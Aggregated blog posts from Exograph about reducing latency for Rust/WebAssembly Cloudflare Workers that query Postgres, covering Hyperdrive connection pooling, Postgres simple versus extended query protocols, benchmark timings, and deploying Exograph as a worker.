socket = Socket::builder() .secure_transport(SecureTransport::StartTls) .connect(host, port)?; let (client, connection) = config .connect_raw(socket, PassthroughTls) .await .map_err(|e| worker::Error::RustError(format!("Failed to connect: {:?}", e)))?; wasm_bindgen_futures::spawn_local(async move { if let Err(error) = connection.await { console_log!("connection error: {:?}", error); } }); let rows: Vec<tokio_postgres::Row> = client .query( "SELECT id, title, completed FROM todos WHERE completed = $1", &[&true], ) .await .map_err(|e| worker::Error::RustError(format!("Failed to query: {:?}", e)))?; Ok(Response::ok(format!("{:?}", rows))?) } ``` There are several notable things (especially if you are new to WebAssembly): - In a non-WebAssembly platform, you would get the client and connection directly using the database URL, which opens a socket to the database. For example, you would have done something like this: ```rust let (client, connection) = config.connect(tls).await?; ``` However, that won't work in a WebAssembly environment since there is no way to connect to a server (or, for that matter, any other resources such as filesystem). This is the core characteristic of WebAssembly: it is a sandboxed environment that cannot access resources unless explicitly provided (thought functions exported to the WebAssembly module). Therefore, we use `Socket::builder().connect()` to create a socket (which, in turn, uses [TCP Socket API provided by Cloudflare runtime](https://developers.cloudflare.com/workers/runtime-apis/tcp-sockets/)). Then, we use `config.connect_raw()` to lay the Postgres protocol over that socket. - We would have marked the `main` function with, for example, `#[tokio::main]` to bring in an async executor. However, here too, WebAssembly is different. Instead, we must rely on the host to provide the async runtime. In our case, Cloudflare worker provides a runtime (which uses JavaScript's event loop). - In a typical Rust program, we would have used `tokio::spawn` to spawn a task. However, in WebAssembly, we use `wasm_bindgen_futures::spawn_local`, which runs in the context of JavaScript's event loop. We will deploy it using `npx wrangler deploy`. You will need to create a database and add the `DATABASE_URL` secret to the worker. You can test the worker using `curl`: ```sh curl https://<worker-url> ``` And measure the latency: ```sh oha -c 1 -n 100 <worker-url> ... Slowest: 0.8975 secs Fastest: 0.2795 secs Average: 0.3441 secs ``` So, our worker takes an average of 345ms to respond to a request. Depending on the use case, this can be between okay-ish and unacceptable. But why is it so slow? We are dealing with two issues here: 1. **Establishing connection to the database**: The worker creates a new connection for each request. Given that a secure connection, it takes 7+ round trips. Not surprisingly, latency is high. 2. **Executing the query**: The `query` method in our code causes the Rust Postgres driver to make two round trips: to prepare the statement and to bind/execute the query. It also sends a one-way message to close the prepared statement. How can we improve? We will address that in the next post by exploring connection pooling and possible changes to the driver. Stay tuned!
ramnivas
1,920,168
Latency at the edge with Rust/WebAssembly and Postgres: Part 2
In the previous post, we implemented a simple Cloudflare Worker in Rust/WebAssembly connecting to a...
0
2024-07-11T23:12:32
https://exograph.dev/blog/wasm-pg-explorations-2
postgres, webassembly, cloudflare, worker
--- title: Latency at the edge with Rust/WebAssembly and Postgres: Part 2 published: true date: 2024-06-06 00:00:00 UTC tags: postgres,WebAssembly,Cloudflare, Worker canonical_url: https://exograph.dev/blog/wasm-pg-explorations-2 --- In the [previous post](https://exograph.dev/blog/wasm-pg-explorations-1), we implemented a simple Cloudflare Worker in Rust/WebAssembly connecting to a [Neon](https://neon.tech/) Postgres database and measured end-to-end latency. Without any pooling, we got a mean response time of 345ms. The two issues we suspected for the high latency were: > **Establishing connection to the database** : The worker creates a new connection for each request. Given that a secure connection, it takes 7+ round trips. Not surprisingly, latency is high. > > **Executing the query** : The query method in our code causes the Rust Postgres driver to make two round trips: to prepare the statement and to bind/execute the query. It also sends a one-way message to close the prepared statement. In this part, we will deal with connection establishment time by introducing a pool. We will fork the driver to deal with multiple round trips (which incidentally also helps with connection pooling). We will also learn a few things about Postgres's query protocol. <svg viewbox="0 0 12 16"><path fill-rule="evenodd" d="M6.5 0C3.48 0 1 2.19 1 5c0 .92.55 2.25 1 3 1.34 2.25 1.78 2.78 2 4v1h5v-1c.22-1.22.66-1.75 2-4 .45-.75 1-2.08 1-3 0-2.81-2.48-5-5.5-5zm3.64 7.48c-.25.44-.47.8-.67 1.11-.86 1.41-1.25 2.06-1.45 3.23-.02.05-.02.11-.02.17H5c0-.06 0-.13-.02-.17-.2-1.17-.59-1.83-1.45-3.23-.2-.31-.42-.67-.67-1.11C2.44 6.78 2 5.65 2 5c0-2.2 2.02-4 4.5-4 1.22 0 2.36.42 3.22 1.19C10.55 2.94 11 3.94 11 5c0 .66-.44 1.78-.86 2.48zM4 14h5c-.23 1.14-1.3 2-2.5 2s-2.27-.86-2.5-2z"></path></svg> > Source code > The source code with all the examples explored in this post is available on [GitHub](https://github.com/exograph/wasm-pg-cloudflare-explorations). With it, you can perform measurements and experiments on your own. ## Introducing connection pooling[​](https://exograph.dev/blog/wasm-pg-explorations-2#introducing-connection-pooling "Direct link to Introducing connection pooling") If the problem is establishing a connection, the solution could be a pool. This way, we can reuse the existing connections instead of creating a new one for each request. ### Application-level pooling[​](https://exograph.dev/blog/wasm-pg-explorations-2#application-level-pooling "Direct link to Application-level pooling") Could we use a pooling crate such as [deadpool](https://github.com/bikeshedder/deadpool)? While that would be a good option in a typical Rust environment (and Exograph uses it), it is not an option in the Cloudflare Worker environment. A worker is considered stateless and should not maintain any state between requests. Since a pool is a stateful object (holding the connections), it can't be used in a worker. If you try to use it, you will get the following runtime error on every other request: ``` Error: Cannot perform I/O on behalf of a different request. I/O objects (such as streams, request/response bodies, and others) created in the context of one request handler cannot be accessed from a different request's handler. This is a limitation of Cloudflare Workers which allows us to improve overall performance. (I/O type: WritableStreamSink) ``` <button type="button" aria-label="Copy code to clipboard" title="Copy"><span aria-hidden="true"><svg viewbox="0 0 24 24"><path fill="currentColor" d="M19,21H8V7H19M19,5H8A2,2 0 0,0 6,7V21A2,2 0 0,0 8,23H19A2,2 0 0,0 21,21V7A2,2 0 0,0 19,5M16,1H4A2,2 0 0,0 2,3V17H4V3H16V1Z"></path></svg><svg viewbox="0 0 24 24"><path fill="currentColor" d="M21,7L9,19L3.5,13.5L4.91,12.09L9,16.17L19.59,5.59L21,7Z"></path></svg></span></button> When the client makes the first request, the worker creates a pool and successfully executes the query. For the second request, the worker tries to reuse the pool, but it fails due to the error above, leading to the eviction of the worker by the Cloudflare runtime. For the third request, a fresh worker creates another pool, and the cycle continues. The error is clear: we cannot use application-level pooling in this environment. ### External pooling[​](https://exograph.dev/blog/wasm-pg-explorations-2#external-pooling "Direct link to External pooling") Since application-level pooling won't work in this environment, could we try an external pool? Cloudflare provides [Hyperdrive](https://developers.cloudflare.com/hyperdrive) for connection pooling (and more, such as query caching). Let's try that. ```rust #[event(fetch)] async fn main(_req: Request, env: Env, _ctx: Context) -> Result<Response> { let hyperdrive = env.hyperdrive("todo-db-hyperdrive")?; let config = hyperdrive .connection_string() .parse::<tokio_postgres::Config>() .map_err(|e| worker::Error::RustError(format!("Failed to parse configuration: {:?}", e)))?; let host = hyperdrive.host(); let port = hyperdrive.port(); // Same as before } ``` <button type="button" aria-label="Copy code to clipboard" title="Copy"><span aria-hidden="true"><svg viewbox="0 0 24 24"><path fill="currentColor" d="M19,21H8V7H19M19,5H8A2,2 0 0,0 6,7V21A2,2 0 0,0 8,23H19A2,2 0 0,0 21,21V7A2,2 0 0,0 19,5M16,1H4A2,2 0 0,0 2,3V17H4V3H16V1Z"></path></svg><svg viewbox="0 0 24 24"><path fill="currentColor" d="M21,7L9,19L3.5,13.5L4.91,12.09L9,16.17L19.59,5.59L21,7Z"></path></svg></span></button> Besides how we get the host and port, the rest of the code (to connect to the database and execute the query) remains the same as the one in [part 1](https://exograph.dev/blog/wasm-pg-explorations-1). You will need to create a Hyperdrive instance using the following command (replace the connection string with your own): ```sh npx wrangler hyperdrive create todo-db-hyperdrive --caching-disabled --connection-string "postgres://..." ``` <button type="button" aria-label="Copy code to clipboard" title="Copy"><span aria-hidden="true"><svg viewbox="0 0 24 24"><path fill="currentColor" d="M19,21H8V7H19M19,5H8A2,2 0 0,0 6,7V21A2,2 0 0,0 8,23H19A2,2 0 0,0 21,21V7A2,2 0 0,0 19,5M16,1H4A2,2 0 0,0 2,3V17H4V3H16V1Z"></path></svg><svg viewbox="0 0 24 24"><path fill="currentColor" d="M21,7L9,19L3.5,13.5L4.91,12.09L9,16.17L19.59,5.59L21,7Z"></path></svg></span></button> We disable [query caching](https://developers.cloudflare.com/hyperdrive/configuration/query-caching/) since that will cause skipping most database calls. Due to the empty cache, the first request will hit the database. For subsequent requests (which execute the same SQL query in our setup), Hyperdrive will likely serve them from its cache. We are interested in measuring the latency to include database calls. With caching turned on, the comparison to the baseline would be apples-to-oranges. <svg viewbox="0 0 14 16"><path fill-rule="evenodd" d="M6.3 5.69a.942.942 0 0 1-.28-.7c0-.28.09-.52.28-.7.19-.18.42-.28.7-.28.28 0 .52.09.7.28.18.19.28.42.28.7 0 .28-.09.52-.28.7a1 1 0 0 1-.7.3c-.28 0-.52-.11-.7-.3zM8 7.99c-.02-.25-.11-.48-.31-.69-.2-.19-.42-.3-.69-.31H6c-.27.02-.48.13-.69.31-.2.2-.3.44-.31.69h1v3c.02.27.11.5.31.69.2.2.42.31.69.31h1c.27 0 .48-.11.69-.31.2-.19.3-.42.31-.69H8V7.98v.01zM7 2.3c-3.14 0-5.7 2.54-5.7 5.68 0 3.14 2.56 5.7 5.7 5.7s5.7-2.55 5.7-5.7c0-3.15-2.56-5.69-5.7-5.69v.01zM7 .98c3.86 0 7 3.14 7 7s-3.14 7-7 7-7-3.12-7-7 3.14-7 7-7z"></path></svg> > For the real-world scenario, you may enable caching to balance database load and freshness of data. Next, you will need to put the Hyperdrive information in wrangler.toml: ```toml [[hyperdrive]] binding = "todo-db-hyperdrive" id = "<your-hyperdrive-id>" ``` <button type="button" aria-label="Copy code to clipboard" title="Copy"><span aria-hidden="true"><svg viewbox="0 0 24 24"><path fill="currentColor" d="M19,21H8V7H19M19,5H8A2,2 0 0,0 6,7V21A2,2 0 0,0 8,23H19A2,2 0 0,0 21,21V7A2,2 0 0,0 19,5M16,1H4A2,2 0 0,0 2,3V17H4V3H16V1Z"></path></svg><svg viewbox="0 0 24 24"><path fill="currentColor" d="M21,7L9,19L3.5,13.5L4.91,12.09L9,16.17L19.59,5.59L21,7Z"></path></svg></span></button> Let's test this worker. ```sh curl <worker-url>INTERNAL SERVER ERROR ``` <button type="button" aria-label="Copy code to clipboard" title="Copy"><span aria-hidden="true"><svg viewbox="0 0 24 24"><path fill="currentColor" d="M19,21H8V7H19M19,5H8A2,2 0 0,0 6,7V21A2,2 0 0,0 8,23H19A2,2 0 0,0 21,21V7A2,2 0 0,0 19,5M16,1H4A2,2 0 0,0 2,3V17H4V3H16V1Z"></path></svg><svg viewbox="0 0 24 24"><path fill="currentColor" d="M21,7L9,19L3.5,13.5L4.91,12.09L9,16.17L19.59,5.59L21,7Z"></path></svg></span></button> Hmm... that failed. <svg viewbox="0 0 16 16"><path fill-rule="evenodd" d="M8.893 1.5c-.183-.31-.52-.5-.887-.5s-.703.19-.886.5L.138 13.499a.98.98 0 0 0 0 1.001c.193.31.53.501.886.501h13.964c.367 0 .704-.19.877-.5a1.03 1.03 0 0 0 .01-1.002L8.893 1.5zm.133 11.497H6.987v-2.003h2.039v2.003zm0-3.004H6.987V5.987h2.039v4.006z"></path></svg> > Fast moving ground > This is due to an issue with the current Hyperdrive implementation. The support for prepared statements is still new and (currently) works only with caching enabled. I have made the Cloudflare team aware of it. I think this will be fixed soon 🤞. As things change, I will add updates here. What's going on? Postgres has two kinds of query protocols: 1. [Simple query protocol](https://www.postgresql.org/docs/current/protocol-flow.html#PROTOCOL-FLOW-SIMPLE-QUERY): With this protocol, you must supply the SQL as a string and include any parameter values in the query (for example, `SELECT * FROM todos WHERE id = 1`). The driver makes one round trip to execute such a query. 2. [Extended query protocol](https://www.postgresql.org/docs/current/protocol-flow.html#PROTOCOL-FLOW-EXT-QUERY): With this protocol, you may have the SQL query with placeholders for parameters (for example, `SELECT * FROM todos WHERE id = $1`), and its execution requires a preparation step. We will go into detail in the [next section](https://exograph.dev/blog/wasm-pg-explorations-2#hyperdrive-with-the-extended-query-protocol). Let's explore both protocols. ## Hyperdrive with the simple query protocol[​](https://exograph.dev/blog/wasm-pg-explorations-2#hyperdrive-with-the-simple-query-protocol "Direct link to Hyperdrive with the simple query protocol") To explore the simple query protocol, we will use the [`simple_query`](https://docs.rs/tokio-postgres/latest/tokio_postgres/struct.Client.html#method.simple_query) method. Since it doesn't allow specifying parameters, we inline them. ```rust #[event(fetch)] async fn main(_req: Request, env: Env, _ctx: Context) -> Result<Response> { /// Hyperdrive setup as before let rows = client .simple_query("SELECT id, title, completed FROM todos WHERE completed = true") .await .map_err(|e| worker::Error::RustError(format!("Failed to query: {:?}", e)))?; ... } ``` <button type="button" aria-label="Copy code to clipboard" title="Copy"><span aria-hidden="true"><svg viewbox="0 0 24 24"><path fill="currentColor" d="M19,21H8V7H19M19,5H8A2,2 0 0,0 6,7V21A2,2 0 0,0 8,23H19A2,2 0 0,0 21,21V7A2,2 0 0,0 19,5M16,1H4A2,2 0 0,0 2,3V17H4V3H16V1Z"></path></svg><svg viewbox="0 0 24 24"><path fill="currentColor" d="M21,7L9,19L3.5,13.5L4.91,12.09L9,16.17L19.59,5.59L21,7Z"></path></svg></span></button> Does it work and how does this perform? ```sh $ oha -c 1 -n 100 <worker-url> Slowest: 0.2871 secs Fastest: 0.0476 secs Average: 0.0633 secs ``` <button type="button" aria-label="Copy code to clipboard" title="Copy"><span aria-hidden="true"><svg viewbox="0 0 24 24"><path fill="currentColor" d="M19,21H8V7H19M19,5H8A2,2 0 0,0 6,7V21A2,2 0 0,0 8,23H19A2,2 0 0,0 21,21V7A2,2 0 0,0 19,5M16,1H4A2,2 0 0,0 2,3V17H4V3H16V1Z"></path></svg><svg viewbox="0 0 24 24"><path fill="currentColor" d="M21,7L9,19L3.5,13.5L4.91,12.09L9,16.17L19.59,5.59L21,7Z"></path></svg></span></button> That's more like it! The mean response time is **63ms** , a significant improvement over the previous 345ms. Since the simple query protocol needed only one round trip, Hyperdrive was able to use an existing connection without too much additional logic, so it worked without any issues and performed well. But... the simple query protocol forces us to use string interpolation to inline the parameters in the query, which is a big no-no in the world of databases due to the risk of SQL injection attacks. So let's not do that! ## Hyperdrive with the extended query protocol[​](https://exograph.dev/blog/wasm-pg-explorations-2#hyperdrive-with-the-extended-query-protocol "Direct link to Hyperdrive with the extended query protocol") Let's go back to the extended query protocol and figure out why Hyperdrive might be struggling with it. As it happens, all external pooling services deal with the same issue; for example, only recently did [pgBouncer](https://www.pgbouncer.org/2023/10/pgbouncer-1-21-0) start to support it. When using the extended query protocol through [`query`](https://docs.rs/tokio-postgres/latest/tokio_postgres/struct.Client.html#method.query), the driver executes the following steps: 1. **Prepare** : Sends a prepare request. This contains a name for the statement (for example, "s1") and a query with the placeholders for parameters to be provided later (for example, $1, $2 etc.). The server sends back the expected parameter types. 2. **Bind/execute** : Sends the name of the prepared statement and the parameters serialized in the format appropriate for the types. The server looks up the prepared statement by name and executes it with the provided parameters. It sends back the rows. 3. **Close** : Closes the prepared statement to free up the resources on the server. In `tokio-postgres`, this is a fire-and-forget operation (doesn't wait for a response). <!-- --> ![](https://exograph.dev/assets/images/extended-quey-light-609b32186fae816db2d153a8a7a66f17.png#gh-light-mode-only) When you add in a connection pool, the driver must invoke the "bind/execute" and "close" with the same connection it used for "prepare". This requires some bookkeeping and is a source of complexity. What if we combine all three steps into a single network package? This is what Exograph's fork of `tokio-postgres` ([fork](https://github.com/exograph/rust-postgres/tree/exograph), [PR](https://github.com/sfackler/rust-postgres/pull/1147)) does. The client must specify the parameter values _and their types_ (we no longer perform a round trip to discover parameter types). This way, the driver can serialize the parameters in the correct format in the same network package. ```rs #[event(fetch)] async fn main(_req: Request, env: Env, _ctx: Context) -> Result<Response> { /// Hyperdrive setup as before let rows: Vec<tokio_postgres::Row> = client .query_with_param_types( "SELECT id, title, completed FROM todos where completed <> $1", &[(&true, Type::BOOL)], ) .await .map_err(|e| worker::Error::RustError(format!("query_with_param_types: {:?}", e)))?; ... } ``` <button type="button" aria-label="Copy code to clipboard" title="Copy"><span aria-hidden="true"><svg viewbox="0 0 24 24"><path fill="currentColor" d="M19,21H8V7H19M19,5H8A2,2 0 0,0 6,7V21A2,2 0 0,0 8,23H19A2,2 0 0,0 21,21V7A2,2 0 0,0 19,5M16,1H4A2,2 0 0,0 2,3V17H4V3H16V1Z"></path></svg><svg viewbox="0 0 24 24"><path fill="currentColor" d="M21,7L9,19L3.5,13.5L4.91,12.09L9,16.17L19.59,5.59L21,7Z"></path></svg></span></button> How does this perform? ``` $ oha -c 1 -n 100 <worker-url> Slowest: 0.2883 secs Fastest: 0.0466 secs Average: 0.0620 secs ``` <button type="button" aria-label="Copy code to clipboard" title="Copy"><span aria-hidden="true"><svg viewbox="0 0 24 24"><path fill="currentColor" d="M19,21H8V7H19M19,5H8A2,2 0 0,0 6,7V21A2,2 0 0,0 8,23H19A2,2 0 0,0 21,21V7A2,2 0 0,0 19,5M16,1H4A2,2 0 0,0 2,3V17H4V3H16V1Z"></path></svg><svg viewbox="0 0 24 24"><path fill="currentColor" d="M21,7L9,19L3.5,13.5L4.91,12.09L9,16.17L19.59,5.59L21,7Z"></path></svg></span></button> Nice! The mean response time is now 62ms, which matches the simple query protocol (63ms). ## Summary[​](https://exograph.dev/blog/wasm-pg-explorations-2#summary "Direct link to Summary") Let's summarize the mean response times for the various configurations: | Method ➡️ | `query` | `simple_query` | `query_with_param_types` | | --- | --- | --- | --- | | Pooling ⬇️ | Timing in milliseconds | | --- | --- | | None | 345 | 312 | **312** | | Hyperdrive | [see above](https://exograph.dev/blog/wasm-pg-explorations-2#external-pooling) | 63 | **62** | With connection pooling through Hyperdrive, we have brought the mean response time by a factor of 5.5 (from 345ms to 62ms)! <svg viewbox="0 0 12 16"><path fill-rule="evenodd" d="M6.5 0C3.48 0 1 2.19 1 5c0 .92.55 2.25 1 3 1.34 2.25 1.78 2.78 2 4v1h5v-1c.22-1.22.66-1.75 2-4 .45-.75 1-2.08 1-3 0-2.81-2.48-5-5.5-5zm3.64 7.48c-.25.44-.47.8-.67 1.11-.86 1.41-1.25 2.06-1.45 3.23-.02.05-.02.11-.02.17H5c0-.06 0-.13-.02-.17-.2-1.17-.59-1.83-1.45-3.23-.2-.31-.42-.67-.67-1.11C2.44 6.78 2 5.65 2 5c0-2.2 2.02-4 4.5-4 1.22 0 2.36.42 3.22 1.19C10.55 2.94 11 3.94 11 5c0 .66-.44 1.78-.86 2.48zM4 14h5c-.23 1.14-1.3 2-2.5 2s-2.27-.86-2.5-2z"></path></svg> > Round trip cost > The 33ms improvement between `query` (345ms) and `query_with_param_types` (312ms) is likely to be due to saving the extra round trip for the "prepare" step but needs further investigation. The source code is available on [GitHub](https://github.com/exograph/wasm-pg-cloudflare-explorations), so you can check this yourself. If you find any improvements or issues, please let me know. So what should you use? Assuming that the issue with Hyperdrive and `query` method has been fixed: - If you don't want to use Hyperdrive, use the `query_with_type_params` method with the forked driver. It does the job in one roundtrip and gives you the best performance without any risk of SQL injection attacks. - If you want to use Hyperdrive: - If you frequently make the same queries, the `query` method will likely do better. Hyperdrive may cache the "prepare" part of the step, making subsequent queries faster. - If you make a variety of queries, you can use the `query_with_param_types` method. Since you won't execute the same query frequently, Hyperdrive's prepare statement caching is unlikely to help. Instead, this method's fewer round trips will be beneficial. Watch Exograph's [blog](https://exograph.com/blog) for more explorations and insights as we ship its Cloudflare Worker support. You can reach us on [Twitter](https://twitter.com/exographdev) or [Discord](https://discord.gg/EPdqyvCpNw). We would appreciate a [star on GitHub](https://github.com/exograph/exograph)!
ramnivas
1,920,169
Exograph at the Edge with Cloudflare Workers
We are excited to announce that Exograph can now run as a Cloudflare Worker! This new capability...
0
2024-07-11T20:40:45
https://exograph.dev/blog/cloudflare-workers
webassembly, cloudflare, workers, edge
--- title: Exograph at the Edge with Cloudflare Workers published: true date: 2024-06-12 00:00:00 UTC tags: WebAssembly, Cloudflare, Workers, Edge canonical_url: https://exograph.dev/blog/cloudflare-workers --- We are excited to announce that Exograph can now run as a [Cloudflare Worker](https://workers.cloudflare.com/)! This new capability allows deploying Exograph servers at the edge, closer to your users, and with lower latency. Cloudflare Workers is a good choice for deploying APIs due to the following characteristics: - They scale automatically to handle changing traffic patterns, including scaling down to zero. - They have an excellent cold start time (in milliseconds). - They get deployed in Cloudflare's global network, thus the workers can be placed optimally for better latency and performance. - They have generous free tier limits that can be sufficient for many applications. With Cloudflare as a deployment option, a question remains: How do we develop backends? Typical backend development can be complex, time-consuming, and expensive, requiring specialized teams to ensure secure and efficient execution. This is where Exograph shines. With Exograph, developers: - Focus only on defining the domain model and authorization rules. - Get inferred APIs (currently GraphQL, with REST and RPC coming soon) that execute securely and efficiently. - Use the provided tools to develop locally, deploy to the cloud, migrate database schemas, etc. - Use telemetry to monitor production usage. Combine Cloudflare Workers with Exograph, and you get cost-effective development and deployment. In this blog, we will show you how to deploy Exograph backends on Cloudflare Workers and how to use Hyperdrive to reduce latency. ## A taste of Exograph on Cloudflare Workers[​](https://exograph.dev/blog/cloudflare-workers#a-taste-of-exograph-on-cloudflare-workers "Direct link to A taste of Exograph on Cloudflare Workers") Exograph provides a CLI command to create a WebAssembly distribution suitable for Cloudflare. It also creates starter configuration files to develop locally and deploy to the cloud. ![exo deploy cf-worker](https://exograph.dev/assets/images/exo-deploy-cf-worker-68b8c8b6e9e79536689d8ea9b5b7027e.png) The command will provide instructions for setting up the database connection. You can create a new database or use an existing one and add its URL as the `EXO_POSTGRES_URL` secret. Cloudflare Workers also integrate with databases such as [Neon](https://neon.tech/) to add this secret through Cloudflare's dashboard. To run the worker locally, you can use the following command: ``` npx wrangler dev... Using vars defined in .dev.vars Your worker has access to the following bindings: - Vars: - EXO_POSTGRES_URL: "(hidden)" - EXO_JWT_SECRET: "(hidden)" ⎔ Starting local server... [wrangler:inf] Ready on http://localhost:8787 ``` <button type="button" aria-label="Copy code to clipboard" title="Copy"><span aria-hidden="true"><svg viewbox="0 0 24 24"><path fill="currentColor" d="M19,21H8V7H19M19,5H8A2,2 0 0,0 6,7V21A2,2 0 0,0 8,23H19A2,2 0 0,0 21,21V7A2,2 0 0,0 19,5M16,1H4A2,2 0 0,0 2,3V17H4V3H16V1Z"></path></svg><svg viewbox="0 0 24 24"><path fill="currentColor" d="M21,7L9,19L3.5,13.5L4.91,12.09L9,16.17L19.59,5.59L21,7Z"></path></svg></span></button> And when you are ready to deploy to the cloud, run: ``` npx wrangler deploy ... Uploaded todo (2.19 sec) Published tod (0.20 sec) https://todo.<domain>.workers.dev... ``` <button type="button" aria-label="Copy code to clipboard" title="Copy"><span aria-hidden="true"><svg viewbox="0 0 24 24"><path fill="currentColor" d="M19,21H8V7H19M19,5H8A2,2 0 0,0 6,7V21A2,2 0 0,0 8,23H19A2,2 0 0,0 21,21V7A2,2 0 0,0 19,5M16,1H4A2,2 0 0,0 2,3V17H4V3H16V1Z"></path></svg><svg viewbox="0 0 24 24"><path fill="currentColor" d="M21,7L9,19L3.5,13.5L4.91,12.09L9,16.17L19.59,5.59L21,7Z"></path></svg></span></button> Please see the [Exograph documentation](https://exograph.dev/docs/deployment/cloudflare-workers) for more details. ## Using Hyperdrive to reduce latency[​](https://exograph.dev/blog/cloudflare-workers#using-hyperdrive-to-reduce-latency "Direct link to Using Hyperdrive to reduce latency") Let's measure the latency of the request with a query to fetch all todos. Here, we have deployed the worker that connects to a Postgres database managed by Neon. ``` oha -c 1 -n 10 -m POST -d '{ "query": "{todos { id }}"}' <worker-url> Slowest: 0.5357 secs Fastest: 0.2436 secs Average: 0.2872 secs ``` <button type="button" aria-label="Copy code to clipboard" title="Copy"><span aria-hidden="true"><svg viewbox="0 0 24 24"><path fill="currentColor" d="M19,21H8V7H19M19,5H8A2,2 0 0,0 6,7V21A2,2 0 0,0 8,23H19A2,2 0 0,0 21,21V7A2,2 0 0,0 19,5M16,1H4A2,2 0 0,0 2,3V17H4V3H16V1Z"></path></svg><svg viewbox="0 0 24 24"><path fill="currentColor" d="M21,7L9,19L3.5,13.5L4.91,12.09L9,16.17L19.59,5.59L21,7Z"></path></svg></span></button> The mean response time of 287ms is good but not stellar. The main reason for increased latency is that the worker has to open a new connection to the Postgres database for every request. If connection establishment time is the problem, connection pooling is a solution. For Cloudflare Worker, connection pooling comes in the form of [Hyperdrive](https://developers.cloudflare.com/hyperdrive/). <svg viewbox="0 0 12 16"><path fill-rule="evenodd" d="M6.5 0C3.48 0 1 2.19 1 5c0 .92.55 2.25 1 3 1.34 2.25 1.78 2.78 2 4v1h5v-1c.22-1.22.66-1.75 2-4 .45-.75 1-2.08 1-3 0-2.81-2.48-5-5.5-5zm3.64 7.48c-.25.44-.47.8-.67 1.11-.86 1.41-1.25 2.06-1.45 3.23-.02.05-.02.11-.02.17H5c0-.06 0-.13-.02-.17-.2-1.17-.59-1.83-1.45-3.23-.2-.31-.42-.67-.67-1.11C2.44 6.78 2 5.65 2 5c0-2.2 2.02-4 4.5-4 1.22 0 2.36.42 3.22 1.19C10.55 2.94 11 3.94 11 5c0 .66-.44 1.78-.86 2.48zM4 14h5c-.23 1.14-1.3 2-2.5 2s-2.27-.86-2.5-2z"></path></svg> {% details **Behind the scenes** %} To extract latency benefits, we dealt with a few challenges. You can read more about them in our previous blog posts on "Latency at the Edge with Rust/WebAssembly and Postgres": [Part 1](https://exograph.dev/blog/wasm-pg-explorations-1) and [Part 2](https://exograph.dev/blog/wasm-pg-explorations-2). {% enddetails %} To use this connection pooling option, you create a Hyperdrive using either the `npx wrangler hyperdrive create` command or the Cloudflare Worker's dashboard. Then add the following to your `wrangler.toml`: ``` EXO_HYPERDRIVE_BINDING = "<binding-name>" [[hyperdrive]] binding = "<binding-name> "id = "..." ``` <button type="button" aria-label="Copy code to clipboard" title="Copy"><span aria-hidden="true"><svg viewbox="0 0 24 24"><path fill="currentColor" d="M19,21H8V7H19M19,5H8A2,2 0 0,0 6,7V21A2,2 0 0,0 8,23H19A2,2 0 0,0 21,21V7A2,2 0 0,0 19,5M16,1H4A2,2 0 0,0 2,3V17H4V3H16V1Z"></path></svg><svg viewbox="0 0 24 24"><path fill="currentColor" d="M21,7L9,19L3.5,13.5L4.91,12.09L9,16.17L19.59,5.59L21,7Z"></path></svg></span></button> The worker will now use Hyperdrive to manage the database connections, significantly reducing the latency of the requests. Let's measure the latency again: ``` oha -c 1 -n 10 -m POST -d '{ "query": "{todos { id }}"}' <worker-url> Slowest: 0.3588 secs Fastest: 0.0879 secs Average: 0.0967 secs ``` <button type="button" aria-label="Copy code to clipboard" title="Copy"><span aria-hidden="true"><svg viewbox="0 0 24 24"><path fill="currentColor" d="M19,21H8V7H19M19,5H8A2,2 0 0,0 6,7V21A2,2 0 0,0 8,23H19A2,2 0 0,0 21,21V7A2,2 0 0,0 19,5M16,1H4A2,2 0 0,0 2,3V17H4V3H16V1Z"></path></svg><svg viewbox="0 0 24 24"><path fill="currentColor" d="M21,7L9,19L3.5,13.5L4.91,12.09L9,16.17L19.59,5.59L21,7Z"></path></svg></span></button> Much better! We have reduced the mean response time to 97ms, significantly faster than the previous 287ms. ## How does it work?[​](https://exograph.dev/blog/cloudflare-workers#how-does-it-work "Direct link to How does it work?") Cloudflare Worker is, at its core, a [V8](https://v8.dev/) runtime capable of running JavaScript code. V8 also supports JavaScript loading and executing WebAssembly modules. To make Exograph run on Cloudflare Workers, we compiled Exograph to WebAssembly. Currently, Rust has the best tooling to target WebAssembly. Here, our decision to implement Exograph in Rust paid off! ![How it works](https://exograph.dev/assets/images/how-it-works-b50a9de02dd6ac65a852e2208094c486.png) As for the developers using Exograph, we ship a WebAssembly binary distribution for `exo-server`, which provides bindings to the Cloudflare Workers runtime and implements a few optimizations that we will see in the next section. It also creates JavaScript scaffolding to interact with the WebAssembly binary. ## Roadmap[​](https://exograph.dev/blog/cloudflare-workers#roadmap "Direct link to Roadmap") Our current Cloudflare worker support is a preview. We are planning on adding more features and improvements in the upcoming releases. Here is a high-level roadmap: - **Improved performance** : While the performance in the current release is already pretty good, especially with Hyperdrive, Exograph's ahead-of-time compilation offers more opportunities to improve it, and we will explore them. - **JS Integration** : Exograph embeds [Deno](https://deno.land/) as the JavaScript engine, but that won't work in Cloudflare Workers. However, Cloudflare worker's primary runtime is JavaScript (WebAssembly is a guest), so we will support integrating Exograph with the host system's JavaScript runtime. - **Trusted documents** : The current release doesn't yet support [trusted documents](https://exograph.dev/docs/production/trusted-documents), but we are working on it. ## What's Next?[​](https://exograph.dev/blog/cloudflare-workers#whats-next "Direct link to What's Next?") Exograph's WebAssembly target is a significant milestone in our journey to bring new possibilities to the Exograph ecosystem. But this is just the beginning. The next blog post will showcase another exciting feature due to this new capability. Stay tuned! We are eager to know how you plan to use Exograph in Cloudflare workers. You can reach us on [Twitter](https://twitter.com/exographdev) or [Discord](https://discord.gg/EPdqyvCpNw) with your feedback. We would appreciate a [star on GitHub](https://github.com/exograph/exograph)!
ramnivas
1,920,170
GraphQL Server in the Browser using WebAssembly
On the heels of our last feature release, we are excited to announce a new feature: Exograph...
0
2024-07-11T20:28:47
https://exograph.dev/blog/playground
webassembly, graphql, playground, rust
